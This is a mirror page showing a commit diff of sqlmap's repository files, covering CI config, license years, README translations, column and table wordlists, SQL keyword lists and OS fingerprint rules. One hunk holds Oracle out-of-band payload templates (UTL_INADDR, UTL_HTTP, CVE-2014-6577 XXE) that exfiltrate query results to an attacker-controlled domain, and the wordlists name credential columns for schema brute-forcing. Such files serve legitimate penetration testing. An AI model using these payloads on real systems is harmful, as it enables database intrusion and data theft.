mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-06 04:31:30 +00:00
Compare commits
1 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
6a57c8e61a |
2
.github/FUNDING.yml
vendored
2
.github/FUNDING.yml
vendored
@@ -1 +1 @@
|
||||
github: sqlmapproject
|
||||
custom: 'https://www.paypal.com/donate?hosted_button_id=A34GMDLKA2V7G'
|
||||
|
||||
8
.github/ISSUE_TEMPLATE/bug_report.md
vendored
8
.github/ISSUE_TEMPLATE/bug_report.md
vendored
@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
|
||||
If applicable, add screenshots to help explain your problem.
|
||||
|
||||
**Running environment:**
|
||||
- sqlmap version [e.g. 1.7.2.12#dev]
|
||||
- Installation method [e.g. pip]
|
||||
- Operating system: [e.g. Microsoft Windows 11]
|
||||
- Python version [e.g. 3.11.2]
|
||||
- sqlmap version [e.g. 1.3.5.93#dev]
|
||||
- Installation method [e.g. git]
|
||||
- Operating system: [e.g. Microsoft Windows 10]
|
||||
- Python version [e.g. 3.5.2]
|
||||
|
||||
**Target details:**
|
||||
- DBMS [e.g. Microsoft SQL Server]
|
||||
|
||||
2
.github/workflows/tests.yml
vendored
2
.github/workflows/tests.yml
vendored
@@ -10,7 +10,7 @@ jobs:
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-latest, macos-latest, windows-latest]
|
||||
python-version: [ '3.11', 'pypy-2.7', 'pypy-3.7' ]
|
||||
python-version: [ '2.x', '3.10', 'pypy-2.7', 'pypy-3.7' ]
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Set up Python
|
||||
|
||||
2
LICENSE
2
LICENSE
@@ -1,7 +1,7 @@
|
||||
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
||||
of the GNU General Public License (GPL) is appended to this file.
|
||||
|
||||
sqlmap is (C) 2006-2024 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||
sqlmap is (C) 2006-2022 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||
|
||||
This program is free software; you may redistribute and/or modify it under
|
||||
the terms of the GNU General Public License as published by the Free
|
||||
|
||||
@@ -57,10 +57,8 @@ Translations
|
||||
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||
* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
|
||||
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
|
||||
* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
|
||||
* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md)
|
||||
* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md)
|
||||
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
|
||||
* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md)
|
||||
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
|
||||
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
||||
@@ -68,9 +66,8 @@ Translations
|
||||
* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
|
||||
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
|
||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md)
|
||||
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
|
||||
* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
|
||||
* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
|
||||
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
||||
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
||||
* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
|
||||
|
||||
@@ -1,3 +1,2 @@
|
||||
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
|
||||
# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
|
||||
# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
id
|
||||
@@ -1844,10 +1844,6 @@ banner_id
|
||||
error
|
||||
language_id
|
||||
val
|
||||
parol
|
||||
familiya
|
||||
imya
|
||||
otchestvo
|
||||
|
||||
# site:jp
|
||||
|
||||
@@ -2735,34 +2731,6 @@ ssn
|
||||
account
|
||||
confidential
|
||||
|
||||
# site:nl
|
||||
|
||||
naam
|
||||
straat
|
||||
gemeente
|
||||
beschrijving
|
||||
id_gebruiker
|
||||
gebruiker_id
|
||||
gebruikersnaam
|
||||
wachtwoord
|
||||
telefoon
|
||||
voornaam
|
||||
achternaam
|
||||
geslacht
|
||||
huisnummer
|
||||
gemeente
|
||||
leeftijd
|
||||
|
||||
# site:cn
|
||||
|
||||
yonghuming
|
||||
mima
|
||||
xingming
|
||||
xingbie
|
||||
touxiang
|
||||
youxiang
|
||||
shouji
|
||||
|
||||
# Misc
|
||||
|
||||
u_pass
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# CTFs
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
[Banners]
|
||||
@@ -399,7 +399,6 @@ XDBWEBSERVICES
|
||||
|
||||
# MySQL
|
||||
information_schema
|
||||
performance_schema
|
||||
mysql
|
||||
phpmyadmin
|
||||
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
users
|
||||
@@ -3578,11 +3578,3 @@ users
|
||||
user_usergroup_map
|
||||
viewlevels
|
||||
weblinks
|
||||
|
||||
# site:nl
|
||||
|
||||
gebruikers
|
||||
|
||||
# site:cn
|
||||
|
||||
yonghu
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
|
||||
@@ -452,762 +452,6 @@ WRITEXOR
|
||||
YEAR_MONTH
|
||||
ZEROFILL
|
||||
|
||||
# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html)
|
||||
|
||||
ACCESSIBLE
|
||||
ACCOUNT
|
||||
ACTION
|
||||
ACTIVE
|
||||
ADD
|
||||
ADMIN
|
||||
AFTER
|
||||
AGAINST
|
||||
AGGREGATE
|
||||
ALGORITHM
|
||||
ALL
|
||||
ALTER
|
||||
ALWAYS
|
||||
ANALYSE
|
||||
ANALYZE
|
||||
AND
|
||||
ANY
|
||||
ARRAY
|
||||
AS
|
||||
ASC
|
||||
ASCII
|
||||
ASENSITIVE
|
||||
AT
|
||||
ATTRIBUTE
|
||||
AUTHENTICATION
|
||||
AUTOEXTEND_SIZE
|
||||
AUTO_INCREMENT
|
||||
AVG
|
||||
AVG_ROW_LENGTH
|
||||
BACKUP
|
||||
BEFORE
|
||||
BEGIN
|
||||
BETWEEN
|
||||
BIGINT
|
||||
BINARY
|
||||
BINLOG
|
||||
BIT
|
||||
BLOB
|
||||
BLOCK
|
||||
BOOL
|
||||
BOOLEAN
|
||||
BOTH
|
||||
BTREE
|
||||
BUCKETS
|
||||
BULK
|
||||
BY
|
||||
BYTE
|
||||
CACHE
|
||||
CALL
|
||||
CASCADE
|
||||
CASCADED
|
||||
CASE
|
||||
CATALOG_NAME
|
||||
CHAIN
|
||||
CHALLENGE_RESPONSE
|
||||
CHANGE
|
||||
CHANGED
|
||||
CHANNEL
|
||||
CHAR
|
||||
CHARACTER
|
||||
CHARSET
|
||||
CHECK
|
||||
CHECKSUM
|
||||
CIPHER
|
||||
CLASS_ORIGIN
|
||||
CLIENT
|
||||
CLONE
|
||||
CLOSE
|
||||
COALESCE
|
||||
CODE
|
||||
COLLATE
|
||||
COLLATION
|
||||
COLUMN
|
||||
COLUMNS
|
||||
COLUMN_FORMAT
|
||||
COLUMN_NAME
|
||||
COMMENT
|
||||
COMMIT
|
||||
COMMITTED
|
||||
COMPACT
|
||||
COMPLETION
|
||||
COMPONENT
|
||||
COMPRESSED
|
||||
COMPRESSION
|
||||
CONCURRENT
|
||||
CONDITION
|
||||
CONNECTION
|
||||
CONSISTENT
|
||||
CONSTRAINT
|
||||
CONSTRAINT_CATALOG
|
||||
CONSTRAINT_NAME
|
||||
CONSTRAINT_SCHEMA
|
||||
CONTAINS
|
||||
CONTEXT
|
||||
CONTINUE
|
||||
CONVERT
|
||||
CPU
|
||||
CREATE
|
||||
CROSS
|
||||
CUBE
|
||||
CUME_DIST
|
||||
CURRENT
|
||||
CURRENT_DATE
|
||||
CURRENT_TIME
|
||||
CURRENT_TIMESTAMP
|
||||
CURRENT_USER
|
||||
CURSOR
|
||||
CURSOR_NAME
|
||||
DATA
|
||||
DATABASE
|
||||
DATABASES
|
||||
DATAFILE
|
||||
DATE
|
||||
DATETIME
|
||||
DAY
|
||||
DAY_HOUR
|
||||
DAY_MICROSECOND
|
||||
DAY_MINUTE
|
||||
DAY_SECOND
|
||||
DEALLOCATE
|
||||
DEC
|
||||
DECIMAL
|
||||
DECLARE
|
||||
DEFAULT
|
||||
DEFAULT_AUTH
|
||||
DEFINER
|
||||
DEFINITION
|
||||
DELAYED
|
||||
DELAY_KEY_WRITE
|
||||
DELETE
|
||||
DENSE_RANK
|
||||
DESC
|
||||
DESCRIBE
|
||||
DESCRIPTION
|
||||
DES_KEY_FILE
|
||||
DETERMINISTIC
|
||||
DIAGNOSTICS
|
||||
DIRECTORY
|
||||
DISABLE
|
||||
DISCARD
|
||||
DISK
|
||||
DISTINCT
|
||||
DISTINCTROW
|
||||
DIV
|
||||
DO
|
||||
DOUBLE
|
||||
DROP
|
||||
DUAL
|
||||
DUMPFILE
|
||||
DUPLICATE
|
||||
DYNAMIC
|
||||
EACH
|
||||
ELSE
|
||||
ELSEIF
|
||||
EMPTY
|
||||
ENABLE
|
||||
ENCLOSED
|
||||
ENCRYPTION
|
||||
END
|
||||
ENDS
|
||||
ENFORCED
|
||||
ENGINE
|
||||
ENGINES
|
||||
ENGINE_ATTRIBUTE
|
||||
ENUM
|
||||
ERROR
|
||||
ERRORS
|
||||
ESCAPE
|
||||
ESCAPED
|
||||
EVENT
|
||||
EVENTS
|
||||
EVERY
|
||||
EXCEPT
|
||||
EXCHANGE
|
||||
EXCLUDE
|
||||
EXECUTE
|
||||
EXISTS
|
||||
EXIT
|
||||
EXPANSION
|
||||
EXPIRE
|
||||
EXPLAIN
|
||||
EXPORT
|
||||
EXTENDED
|
||||
EXTENT_SIZE
|
||||
FACTOR
|
||||
FAILED_LOGIN_ATTEMPTS
|
||||
FALSE
|
||||
FAST
|
||||
FAULTS
|
||||
FETCH
|
||||
FIELDS
|
||||
FILE
|
||||
FILE_BLOCK_SIZE
|
||||
FILTER
|
||||
FINISH
|
||||
FIRST
|
||||
FIRST_VALUE
|
||||
FIXED
|
||||
FLOAT
|
||||
FLOAT4
|
||||
FLOAT8
|
||||
FLUSH
|
||||
FOLLOWING
|
||||
FOLLOWS
|
||||
FOR
|
||||
FORCE
|
||||
FOREIGN
|
||||
FORMAT
|
||||
FOUND
|
||||
FROM
|
||||
FULL
|
||||
FULLTEXT
|
||||
FUNCTION
|
||||
GENERAL
|
||||
GENERATE
|
||||
GENERATED
|
||||
GEOMCOLLECTION
|
||||
GEOMETRY
|
||||
GEOMETRYCOLLECTION
|
||||
GET
|
||||
GET_FORMAT
|
||||
GET_MASTER_PUBLIC_KEY
|
||||
GET_SOURCE_PUBLIC_KEY
|
||||
GLOBAL
|
||||
GRANT
|
||||
GRANTS
|
||||
GROUP
|
||||
GROUPING
|
||||
GROUPS
|
||||
GROUP_REPLICATION
|
||||
GTID_ONLY
|
||||
HANDLER
|
||||
HASH
|
||||
HAVING
|
||||
HELP
|
||||
HIGH_PRIORITY
|
||||
HISTOGRAM
|
||||
HISTORY
|
||||
HOST
|
||||
HOSTS
|
||||
HOUR
|
||||
HOUR_MICROSECOND
|
||||
HOUR_MINUTE
|
||||
HOUR_SECOND
|
||||
IDENTIFIED
|
||||
IF
|
||||
IGNORE
|
||||
IGNORE_SERVER_IDS
|
||||
IMPORT
|
||||
IN
|
||||
INACTIVE
|
||||
INDEX
|
||||
INDEXES
|
||||
INFILE
|
||||
INITIAL
|
||||
INITIAL_SIZE
|
||||
INITIATE
|
||||
INNER
|
||||
INOUT
|
||||
INSENSITIVE
|
||||
INSERT
|
||||
INSERT_METHOD
|
||||
INSTALL
|
||||
INSTANCE
|
||||
INT
|
||||
INT1
|
||||
INT2
|
||||
INT3
|
||||
INT4
|
||||
INT8
|
||||
INTEGER
|
||||
INTERSECT
|
||||
INTERVAL
|
||||
INTO
|
||||
INVISIBLE
|
||||
INVOKER
|
||||
IO
|
||||
IO_AFTER_GTIDS
|
||||
IO_BEFORE_GTIDS
|
||||
IO_THREAD
|
||||
IPC
|
||||
IS
|
||||
ISOLATION
|
||||
ISSUER
|
||||
ITERATE
|
||||
JOIN
|
||||
JSON
|
||||
JSON_TABLE
|
||||
JSON_VALUE
|
||||
KEY
|
||||
KEYRING
|
||||
KEYS
|
||||
KEY_BLOCK_SIZE
|
||||
KILL
|
||||
LAG
|
||||
LANGUAGE
|
||||
LAST
|
||||
LAST_VALUE
|
||||
LATERAL
|
||||
LEAD
|
||||
LEADING
|
||||
LEAVE
|
||||
LEAVES
|
||||
LEFT
|
||||
LESS
|
||||
LEVEL
|
||||
LIKE
|
||||
LIMIT
|
||||
LINEAR
|
||||
LINES
|
||||
LINESTRING
|
||||
LIST
|
||||
LOAD
|
||||
LOCAL
|
||||
LOCALTIME
|
||||
LOCALTIMESTAMP
|
||||
LOCK
|
||||
LOCKED
|
||||
LOCKS
|
||||
LOGFILE
|
||||
LOGS
|
||||
LONG
|
||||
LONGBLOB
|
||||
LONGTEXT
|
||||
LOOP
|
||||
LOW_PRIORITY
|
||||
MASTER
|
||||
MASTER_AUTO_POSITION
|
||||
MASTER_BIND
|
||||
MASTER_COMPRESSION_ALGORITHMS
|
||||
MASTER_CONNECT_RETRY
|
||||
MASTER_DELAY
|
||||
MASTER_HEARTBEAT_PERIOD
|
||||
MASTER_HOST
|
||||
MASTER_LOG_FILE
|
||||
MASTER_LOG_POS
|
||||
MASTER_PASSWORD
|
||||
MASTER_PORT
|
||||
MASTER_PUBLIC_KEY_PATH
|
||||
MASTER_RETRY_COUNT
|
||||
MASTER_SERVER_ID
|
||||
MASTER_SSL
|
||||
MASTER_SSL_CA
|
||||
MASTER_SSL_CAPATH
|
||||
MASTER_SSL_CERT
|
||||
MASTER_SSL_CIPHER
|
||||
MASTER_SSL_CRL
|
||||
MASTER_SSL_CRLPATH
|
||||
MASTER_SSL_KEY
|
||||
MASTER_SSL_VERIFY_SERVER_CERT
|
||||
MASTER_TLS_CIPHERSUITES
|
||||
MASTER_TLS_VERSION
|
||||
MASTER_USER
|
||||
MASTER_ZSTD_COMPRESSION_LEVEL
|
||||
MATCH
|
||||
MAXVALUE
|
||||
MAX_CONNECTIONS_PER_HOUR
|
||||
MAX_QUERIES_PER_HOUR
|
||||
MAX_ROWS
|
||||
MAX_SIZE
|
||||
MAX_UPDATES_PER_HOUR
|
||||
MAX_USER_CONNECTIONS
|
||||
MEDIUM
|
||||
MEDIUMBLOB
|
||||
MEDIUMINT
|
||||
MEDIUMTEXT
|
||||
MEMBER
|
||||
MEMORY
|
||||
MERGE
|
||||
MESSAGE_TEXT
|
||||
MICROSECOND
|
||||
MIDDLEINT
|
||||
MIGRATE
|
||||
MINUTE
|
||||
MINUTE_MICROSECOND
|
||||
MINUTE_SECOND
|
||||
MIN_ROWS
|
||||
MOD
|
||||
MODE
|
||||
MODIFIES
|
||||
MODIFY
|
||||
MONTH
|
||||
MULTILINESTRING
|
||||
MULTIPOINT
|
||||
MULTIPOLYGON
|
||||
MUTEX
|
||||
MYSQL_ERRNO
|
||||
NAME
|
||||
NAMES
|
||||
NATIONAL
|
||||
NATURAL
|
||||
NCHAR
|
||||
NDB
|
||||
NDBCLUSTER
|
||||
NESTED
|
||||
NETWORK_NAMESPACE
|
||||
NEVER
|
||||
NEW
|
||||
NEXT
|
||||
NO
|
||||
NODEGROUP
|
||||
NONE
|
||||
NOT
|
||||
NOWAIT
|
||||
NO_WAIT
|
||||
NO_WRITE_TO_BINLOG
|
||||
NTH_VALUE
|
||||
NTILE
|
||||
NULL
|
||||
NULLS
|
||||
NUMBER
|
||||
NUMERIC
|
||||
NVARCHAR
|
||||
OF
|
||||
OFF
|
||||
OFFSET
|
||||
OJ
|
||||
OLD
|
||||
ON
|
||||
ONE
|
||||
ONLY
|
||||
OPEN
|
||||
OPTIMIZE
|
||||
OPTIMIZER_COSTS
|
||||
OPTION
|
||||
OPTIONAL
|
||||
OPTIONALLY
|
||||
OPTIONS
|
||||
OR
|
||||
ORDER
|
||||
ORDINALITY
|
||||
ORGANIZATION
|
||||
OTHERS
|
||||
OUT
|
||||
OUTER
|
||||
OUTFILE
|
||||
OVER
|
||||
OWNER
|
||||
PACK_KEYS
|
||||
PAGE
|
||||
PARSER
|
||||
PARTIAL
|
||||
PARTITION
|
||||
PARTITIONING
|
||||
PARTITIONS
|
||||
PASSWORD_LOCK_TIME
|
||||
PATH
|
||||
PERCENT_RANK
|
||||
PERSIST
|
||||
PERSIST_ONLY
|
||||
PHASE
|
||||
PLUGIN
|
||||
PLUGINS
|
||||
PLUGIN_DIR
|
||||
POINT
|
||||
POLYGON
|
||||
PORT
|
||||
PRECEDES
|
||||
PRECEDING
|
||||
PRECISION
|
||||
PREPARE
|
||||
PRESERVE
|
||||
PREV
|
||||
PRIMARY
|
||||
PRIVILEGES
|
||||
PRIVILEGE_CHECKS_USER
|
||||
PROCEDURE
|
||||
PROCESS
|
||||
PROCESSLIST
|
||||
PROFILE
|
||||
PROFILES
|
||||
PROXY
|
||||
PURGE
|
||||
QUARTER
|
||||
QUERY
|
||||
QUICK
|
||||
RANDOM
|
||||
RANGE
|
||||
RANK
|
||||
READ
|
||||
READS
|
||||
READ_ONLY
|
||||
READ_WRITE
|
||||
REAL
|
||||
REBUILD
|
||||
RECOVER
|
||||
RECURSIVE
|
||||
REDOFILE
|
||||
REDO_BUFFER_SIZE
|
||||
REDUNDANT
|
||||
REFERENCE
|
||||
REFERENCES
|
||||
REGEXP
|
||||
REGISTRATION
|
||||
RELAY
|
||||
RELAYLOG
|
||||
RELAY_LOG_FILE
|
||||
RELAY_LOG_POS
|
||||
RELAY_THREAD
|
||||
RELEASE
|
||||
RELOAD
|
||||
REMOTE
|
||||
REMOVE
|
||||
RENAME
|
||||
REORGANIZE
|
||||
REPAIR
|
||||
REPEAT
|
||||
REPEATABLE
|
||||
REPLACE
|
||||
REPLICA
|
||||
REPLICAS
|
||||
REPLICATE_DO_DB
|
||||
REPLICATE_DO_TABLE
|
||||
REPLICATE_IGNORE_DB
|
||||
REPLICATE_IGNORE_TABLE
|
||||
REPLICATE_REWRITE_DB
|
||||
REPLICATE_WILD_DO_TABLE
|
||||
REPLICATE_WILD_IGNORE_TABLE
|
||||
REPLICATION
|
||||
REQUIRE
|
||||
REQUIRE_ROW_FORMAT
|
||||
RESET
|
||||
RESIGNAL
|
||||
RESOURCE
|
||||
RESPECT
|
||||
RESTART
|
||||
RESTORE
|
||||
RESTRICT
|
||||
RESUME
|
||||
RETAIN
|
||||
RETURN
|
||||
RETURNED_SQLSTATE
|
||||
RETURNING
|
||||
RETURNS
|
||||
REUSE
|
||||
REVERSE
|
||||
REVOKE
|
||||
RIGHT
|
||||
RLIKE
|
||||
ROLE
|
||||
ROLLBACK
|
||||
ROLLUP
|
||||
ROTATE
|
||||
ROUTINE
|
||||
ROW
|
||||
ROWS
|
||||
ROW_COUNT
|
||||
ROW_FORMAT
|
||||
ROW_NUMBER
|
||||
RTREE
|
||||
SAVEPOINT
|
||||
SCHEDULE
|
||||
SCHEMA
|
||||
SCHEMAS
|
||||
SCHEMA_NAME
|
||||
SECOND
|
||||
SECONDARY
|
||||
SECONDARY_ENGINE
|
||||
SECONDARY_ENGINE_ATTRIBUTE
|
||||
SECONDARY_LOAD
|
||||
SECONDARY_UNLOAD
|
||||
SECOND_MICROSECOND
|
||||
SECURITY
|
||||
SELECT
|
||||
SENSITIVE
|
||||
SEPARATOR
|
||||
SERIAL
|
||||
SERIALIZABLE
|
||||
SERVER
|
||||
SESSION
|
||||
SET
|
||||
SHARE
|
||||
SHOW
|
||||
SHUTDOWN
|
||||
SIGNAL
|
||||
SIGNED
|
||||
SIMPLE
|
||||
SKIP
|
||||
SLAVE
|
||||
SLOW
|
||||
SMALLINT
|
||||
SNAPSHOT
|
||||
SOCKET
|
||||
SOME
|
||||
SONAME
|
||||
SOUNDS
|
||||
SOURCE
|
||||
SOURCE_AUTO_POSITION
|
||||
SOURCE_BIND
|
||||
SOURCE_COMPRESSION_ALGORITHMS
|
||||
SOURCE_CONNECT_RETRY
|
||||
SOURCE_DELAY
|
||||
SOURCE_HEARTBEAT_PERIOD
|
||||
SOURCE_HOST
|
||||
SOURCE_LOG_FILE
|
||||
SOURCE_LOG_POS
|
||||
SOURCE_PASSWORD
|
||||
SOURCE_PORT
|
||||
SOURCE_PUBLIC_KEY_PATH
|
||||
SOURCE_RETRY_COUNT
|
||||
SOURCE_SSL
|
||||
SOURCE_SSL_CA
|
||||
SOURCE_SSL_CAPATH
|
||||
SOURCE_SSL_CERT
|
||||
SOURCE_SSL_CIPHER
|
||||
SOURCE_SSL_CRL
|
||||
SOURCE_SSL_CRLPATH
|
||||
SOURCE_SSL_KEY
|
||||
SOURCE_SSL_VERIFY_SERVER_CERT
|
||||
SOURCE_TLS_CIPHERSUITES
|
||||
SOURCE_TLS_VERSION
|
||||
SOURCE_USER
|
||||
SOURCE_ZSTD_COMPRESSION_LEVEL
|
||||
SPATIAL
|
||||
SPECIFIC
|
||||
SQL
|
||||
SQLEXCEPTION
|
||||
SQLSTATE
|
||||
SQLWARNING
|
||||
SQL_AFTER_GTIDS
|
||||
SQL_AFTER_MTS_GAPS
|
||||
SQL_BEFORE_GTIDS
|
||||
SQL_BIG_RESULT
|
||||
SQL_BUFFER_RESULT
|
||||
SQL_CACHE
|
||||
SQL_CALC_FOUND_ROWS
|
||||
SQL_NO_CACHE
|
||||
SQL_SMALL_RESULT
|
||||
SQL_THREAD
|
||||
SQL_TSI_DAY
|
||||
SQL_TSI_HOUR
|
||||
SQL_TSI_MINUTE
|
||||
SQL_TSI_MONTH
|
||||
SQL_TSI_QUARTER
|
||||
SQL_TSI_SECOND
|
||||
SQL_TSI_WEEK
|
||||
SQL_TSI_YEAR
|
||||
SRID
|
||||
SSL
|
||||
STACKED
|
||||
START
|
||||
STARTING
|
||||
STARTS
|
||||
STATS_AUTO_RECALC
|
||||
STATS_PERSISTENT
|
||||
STATS_SAMPLE_PAGES
|
||||
STATUS
|
||||
STOP
|
||||
STORAGE
|
||||
STORED
|
||||
STRAIGHT_JOIN
|
||||
STREAM
|
||||
STRING
|
||||
SUBCLASS_ORIGIN
|
||||
SUBJECT
|
||||
SUBPARTITION
|
||||
SUBPARTITIONS
|
||||
SUPER
|
||||
SUSPEND
|
||||
SWAPS
|
||||
SWITCHES
|
||||
SYSTEM
|
||||
TABLE
|
||||
TABLES
|
||||
TABLESPACE
|
||||
TABLE_CHECKSUM
|
||||
TABLE_NAME
|
||||
TEMPORARY
|
||||
TEMPTABLE
|
||||
TERMINATED
|
||||
TEXT
|
||||
THAN
|
||||
THEN
|
||||
THREAD_PRIORITY
|
||||
TIES
|
||||
TIME
|
||||
TIMESTAMP
|
||||
TIMESTAMPADD
|
||||
TIMESTAMPDIFF
|
||||
TINYBLOB
|
||||
TINYINT
|
||||
TINYTEXT
|
||||
TLS
|
||||
TO
|
||||
TRAILING
|
||||
TRANSACTION
|
||||
TRIGGER
|
||||
TRIGGERS
|
||||
TRUE
|
||||
TRUNCATE
|
||||
TYPE
|
||||
TYPES
|
||||
UNBOUNDED
|
||||
UNCOMMITTED
|
||||
UNDEFINED
|
||||
UNDO
|
||||
UNDOFILE
|
||||
UNDO_BUFFER_SIZE
|
||||
UNICODE
|
||||
UNINSTALL
|
||||
UNION
|
||||
UNIQUE
|
||||
UNKNOWN
|
||||
UNLOCK
|
||||
UNREGISTER
|
||||
UNSIGNED
|
||||
UNTIL
|
||||
UPDATE
|
||||
UPGRADE
|
||||
URL
|
||||
USAGE
|
||||
USE
|
||||
USER
|
||||
USER_RESOURCES
|
||||
USE_FRM
|
||||
USING
|
||||
UTC_DATE
|
||||
UTC_TIME
|
||||
UTC_TIMESTAMP
|
||||
VALIDATION
|
||||
VALUE
|
||||
VALUES
|
||||
VARBINARY
|
||||
VARCHAR
|
||||
VARCHARACTER
|
||||
VARIABLES
|
||||
VARYING
|
||||
VCPU
|
||||
VIEW
|
||||
VIRTUAL
|
||||
VISIBLE
|
||||
WAIT
|
||||
WARNINGS
|
||||
WEEK
|
||||
WEIGHT_STRING
|
||||
WHEN
|
||||
WHERE
|
||||
WHILE
|
||||
WINDOW
|
||||
WITH
|
||||
WITHOUT
|
||||
WORK
|
||||
WRAPPER
|
||||
WRITE
|
||||
X509
|
||||
XA
|
||||
XID
|
||||
XML
|
||||
XOR
|
||||
YEAR
|
||||
YEAR_MONTH
|
||||
ZEROFILL
|
||||
ZONE
|
||||
|
||||
# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html)
|
||||
|
||||
ABS
|
||||
@@ -1628,8 +872,3 @@ XMLTABLE
|
||||
XMLTEXT
|
||||
XMLVALIDATE
|
||||
YEAR
|
||||
|
||||
# Misc
|
||||
|
||||
ORD
|
||||
MID
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# Opera
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -34,7 +34,7 @@
|
||||
<!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
|
||||
|
||||
<regexp value="Windows.*\b10\.0">
|
||||
<info type="Windows" distrib="2016|2019|2022|10|11"/>
|
||||
<info type="Windows" distrib="2016|2019|10|11"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Windows.*\b6\.3">
|
||||
|
||||
@@ -10,7 +10,7 @@
|
||||
<!-- Microsoft IIS -->
|
||||
|
||||
<regexp value="Microsoft-IIS/(10\.0)">
|
||||
<info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2016|2019|2022|10|11"/>
|
||||
<info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2019|2016|10"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft-IIS/(8\.5)">
|
||||
@@ -878,11 +878,7 @@
|
||||
</regexp>
|
||||
|
||||
